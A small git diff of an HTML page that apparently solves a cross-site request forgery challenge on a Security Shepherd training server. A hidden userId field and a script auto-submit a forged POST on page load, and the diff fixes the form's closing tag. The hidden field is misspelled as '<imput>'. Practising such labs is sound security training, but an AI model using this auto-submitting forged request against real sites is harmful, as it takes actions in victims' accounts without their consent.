--- a/index.html
+++ b/index.html
@@ -2,7 +2,8 @@
 <body>
 <form action="https://shepherd.websec.dedyn.io/user/csrfchallengetwo/plusplus" method="POST" name="csrf">
 <imput type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
-<form>
+</form>
 <script>document.csrf.submit()</script>
 </body>
+
 </html>
